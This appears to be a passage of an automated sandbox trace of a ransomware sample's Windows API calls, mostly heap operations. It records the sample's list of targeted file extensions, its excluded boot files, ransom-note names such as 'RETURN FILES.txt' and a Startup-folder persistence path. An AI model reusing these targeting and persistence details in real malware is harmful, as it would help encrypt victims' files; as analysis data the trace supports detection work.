0x707490 [0153.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x6de328 [0153.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707418 [0153.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x7074a8 [0153.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707358 [0153.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707508 [0153.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707538 [0153.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707598 [0153.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe) returned 0x7074c0 [0153.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707520 [0153.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707550 [0153.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707568 [0153.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7074f0 [0153.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707370 [0153.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707580 [0153.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7075b0 [0153.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7072c8 [0153.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x6de368 [0153.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7073a0 [0153.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707640 [0153.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7076d0 [0153.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707760 [0153.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707778 [0153.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7075e0 [0153.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7076b8 [0153.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7076e8 [0153.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7075f8 [0153.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe) returned 0x707718 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7075c8 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe) returned 0x707628 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707700 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707730 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707610 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707658 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707670 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x707748 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707688 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7076a0 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707250 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707268 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7071d8 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707040 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x706fe0 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7072b0 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707190 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707178 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7071a8 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7070b8 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707070 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707010 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707058 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x706ff8 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x706fc8 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x7071c0 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x12) returned 0x6b6590 [0153.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707028 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707088 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7070a0 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7070d0 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7070e8 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707100 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707160 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707118 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7071f0 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707298 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707130 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707148 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707208 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707220 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707238 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707280 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707ef0 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7080e8 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707f38 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x708088 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x707ff8 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x707f08 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x707fb0 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe) returned 0x7081a8 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x707fc8 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x6de378 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707f50 [0153.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x6de158 [0153.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x708040 [0153.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x708028 [0153.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7081c0 [0153.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x707fe0 [0153.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x7080b8 [0153.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x708178 [0153.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x708010 [0153.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7080a0 [0153.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x7080d0 [0153.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x708058 [0153.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x708070 [0153.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x708100 [0153.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x708130 [0153.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x708118 [0153.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x6de238 [0153.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x708148 [0153.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa) returned 0x707f20 [0153.330] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x7077a0, Size=0x800) returned 0x7083b0 [0153.331] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776 [0153.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e5280 | out: hHeap=0x6a0000) returned 1 [0153.331] lstrlenW (lpString="") returned 0 [0153.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x709068 | out: hHeap=0x6a0000) returned 1 [0153.331] lstrlenW (lpString=".bat") returned 4 [0153.331] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de408, Size=0x8) returned 0x6de208 [0153.331] lstrlenW (lpString=".bat") returned 4 [0153.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x7090c8 | out: hHeap=0x6a0000) returned 1 [0153.331] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x709098, Size=0x20) returned 0x6ddbb0 [0153.331] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6ddbb0, Size=0x40) returned 0x6b7430 [0153.331] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b7430, Size=0x80) returned 0x6e5990 [0153.331] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de408, Size=0x8) returned 0x6de0d8 [0153.331] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de0d8, Size=0x10) returned 0x708f60 [0153.331] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x708f60, Size=0x20) returned 0x6dd9f8 [0153.331] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48 [0153.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e5990 | out: hHeap=0x6a0000) returned 1 [0153.331] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x709098, Size=0x20) returned 0x6ddd18 [0153.331] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6ddd18, Size=0x40) returned 0x6b7430 [0153.331] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0153.331] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0153.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b7430 | out: hHeap=0x6a0000) returned 1 [0153.331] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x708f30, Size=0x20) returned 0x6dda70 [0153.332] lstrlenW (lpString="Info.hta") returned 8 [0153.332] lstrlenW (lpString="Info.hta") returned 8 [0153.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dda70 | out: hHeap=0x6a0000) returned 1 [0153.332] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7093c0, nSize=0x7fff | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\hgaibc.exe")) returned 0x47 [0153.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x7093c0 | out: hHeap=0x6a0000) returned 1 [0153.332] lstrlenW (lpString="hgaibc.exe") returned 10 [0153.332] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6dd9f8, Size=0x40) returned 0x6b7430 [0153.332] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x709188, Size=0x20) returned 0x6dda48 [0153.332] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x709098, Size=0x20) returned 0x6dda70 [0153.332] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6dda70, Size=0x40) returned 0x6b74c0 [0153.332] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b74c0, Size=0x80) returned 0x6e5aa0 [0153.332] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e5aa0, Size=0x100) returned 0x72a160 [0153.332] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0153.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x72a160 | out: hHeap=0x6a0000) returned 1 [0153.332] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x7093c0, nSize=0x8000 | out: lpDst="C:\\WINDOWS;") returned 0xc [0153.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x7193c8 | out: hHeap=0x6a0000) returned 1 [0153.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x7093c0 | out: hHeap=0x6a0000) returned 1 [0153.334] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de288, Size=0x8) returned 0x6de128 [0153.334] lstrlenW (lpString="%windir%;") returned 9 [0153.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dda48 | out: hHeap=0x6a0000) returned 1 [0153.334] lstrlenW (lpString="C:\\WINDOWS;") returned 11 [0153.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6f6f90 | out: hHeap=0x6a0000) returned 1 [0153.334] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x7091b8, Size=0x20) returned 0x6ddd18 [0153.334] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6ddd18, Size=0x40) returned 0x6b7790 [0153.334] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b7790, Size=0x80) returned 0x6e5770 [0153.334] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e5770, Size=0x100) returned 0x729500 [0153.334] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de218, Size=0x8) returned 0x6de288 [0153.334] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de288, Size=0x10) returned 0x7091a0 [0153.334] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x7091a0, Size=0x20) returned 0x6ddae8 [0153.334] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de178, Size=0x8) returned 0x6de1b8 [0153.334] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de198, Size=0x8) returned 0x6de148 [0153.334] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de138, Size=0x8) returned 0x6de0b8 [0153.334] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de0b8, Size=0x10) returned 0x708f18 [0153.334] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x708f18, Size=0x20) returned 0x6dd908 [0153.335] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de1b8, Size=0x10) returned 0x708f18 [0153.335] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de148, Size=0x10) returned 0x708f30 [0153.335] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de1d8, Size=0x8) returned 0x6de0b8 [0153.335] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de1b8, Size=0x8) returned 0x6de248 [0153.335] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x708f18, Size=0x20) returned 0x6ddd18 [0153.335] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x708f30, Size=0x20) returned 0x6ddc00 [0153.335] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de0d8, Size=0x8) returned 0x6de1b8 [0153.335] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0153.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x729500 | out: hHeap=0x6a0000) returned 1 [0153.335] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x709008, Size=0x20) returned 0x6dd8b8 [0153.335] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x6f6f90, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0153.335] lstrlenW (lpString="C:\\") returned 3 [0153.335] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x19fca4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x19fca4*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0153.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6f6f90 | out: hHeap=0x6a0000) returned 1 [0153.336] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de138, Size=0x82) returned 0x6e6a90 [0153.336] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de168, Size=0x100) returned 0x729710 [0153.336] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e6a90, Size=0x104) returned 0x6e6c40 [0153.337] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x729710, Size=0x200) returned 0x7077a0 [0153.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6de1f8 | out: hHeap=0x6a0000) returned 1 [0153.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x7077a0 | out: hHeap=0x6a0000) returned 1 [0153.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x709260 | out: hHeap=0x6a0000) returned 1 [0153.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e6100 | out: hHeap=0x6a0000) returned 1 [0153.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x709308 | out: hHeap=0x6a0000) returned 1 [0153.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e5a18 | out: hHeap=0x6a0000) returned 1 [0153.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x709368 | out: hHeap=0x6a0000) returned 1 [0153.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e6c40 | out: hHeap=0x6a0000) returned 1 [0153.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x709248 | out: hHeap=0x6a0000) returned 1 [0153.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e6b20 | out: hHeap=0x6a0000) returned 1 [0153.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x709200 | out: hHeap=0x6a0000) returned 1 [0153.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e6bb0 | out: hHeap=0x6a0000) returned 1 [0153.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x709350 | out: hHeap=0x6a0000) returned 1 [0153.338] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x709308, Size=0x20) returned 0x6dda70 [0153.338] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6dda70, Size=0x40) returned 0x6b7508 [0153.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6de108 | out: hHeap=0x6a0000) returned 1 [0153.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x709008 | out: hHeap=0x6a0000) returned 1 [0153.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e3ee0 | out: hHeap=0x6a0000) returned 1 [0153.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x7091e8 | out: hHeap=0x6a0000) returned 1 [0153.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e56e8 | out: hHeap=0x6a0000) returned 1 [0153.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x709230 | out: hHeap=0x6a0000) returned 1 [0153.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6de178 | out: hHeap=0x6a0000) returned 1 [0153.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x7092f0 | out: hHeap=0x6a0000) returned 1 [0153.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b55b0 | out: hHeap=0x6a0000) returned 1 [0153.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b66b0 | out: hHeap=0x6a0000) returned 1 [0153.339] lstrlenW (lpString="%systemdrive%") returned 13 [0153.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dd8b8 | out: hHeap=0x6a0000) returned 1 [0153.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e5660 | out: hHeap=0x6a0000) returned 1 [0153.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6de0d8 | out: hHeap=0x6a0000) returned 1 [0153.339] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x6e6f70, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0153.340] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x709290, Size=0x20) returned 0x6ddb10 [0153.340] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6ddb10, Size=0x40) returned 0x6b76b8 [0153.340] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b76b8, Size=0x80) returned 0x6e5880 [0153.340] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e5880, Size=0x100) returned 0x729b30 [0153.340] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x729b30, Size=0x200) returned 0x6e6a90 [0153.340] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e6a90, Size=0x400) returned 0x7077a0 [0153.340] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x7077a0, Size=0x800) returned 0x72a3d8 [0153.340] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x72a3d8, Size=0x1000) returned 0x6f8f98 [0153.341] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de138, Size=0x8) returned 0x6de1d8 [0153.341] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6de1d8, Size=0x10) returned 0x7092c0 [0153.341] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x7092c0, Size=0x20) returned 0x6ddc78 [0153.341] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6ddc78, Size=0x40) returned 0x6b7598 [0153.341] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b7598, Size=0x80) returned 0x6e5d48 [0153.341] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e5d48, Size=0x100) returned 0x72a160 [0153.341] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x72a160, Size=0x200) returned 0x6e6a90 [0153.341] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e6a90, Size=0x400) returned 0x7077a0 [0153.341] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x7077a0, Size=0x800) returned 0x6fafa8 [0153.341] 